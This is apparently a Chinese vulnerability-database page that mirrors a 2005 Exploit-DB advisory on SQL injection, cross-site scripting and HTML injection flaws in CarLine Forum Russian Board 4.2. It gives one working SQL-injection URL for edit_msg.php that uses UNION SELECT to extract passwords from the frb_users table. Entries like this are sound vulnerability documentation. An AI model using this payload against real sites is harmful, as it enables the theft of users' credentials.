CarLine Forum Russian Board 4.2 – ‘edit_msg.php?name_ig_array1[1]’ SQL Injection

31次阅读
没有评论

CarLine Forum Russian Board 4.2 – ‘edit_msg.php?name_ig_array1[1]’ SQL Injection

漏洞ID 1055186 漏洞类型
发布时间 2005-06-23 更新时间 2005-06-23
CarLine Forum Russian Board 4.2 - 'edit_msg.php?name_ig_array1[1]' SQL InjectionCVE编号 N/A
CarLine Forum Russian Board 4.2 - 'edit_msg.php?name_ig_array1[1]' SQL InjectionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25891
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14045/info
              
Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.
              
Forum Russian Board 4.2 is reported to be affected. 

edit_msg.php?m_id=1&t=1&mid=1&cat=3&name_ig_array1[1]=666' union select password,password from frb_users /*

相关推荐: cPanel 5-9 – Passwd SQL Injection

cPanel 5-9 – Passwd SQL Injection 漏洞ID 1054489 漏洞类型 发布时间 2004-06-09 更新时间 2004-06-09 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP CVSS评分 N/A |漏洞…

正文完
 0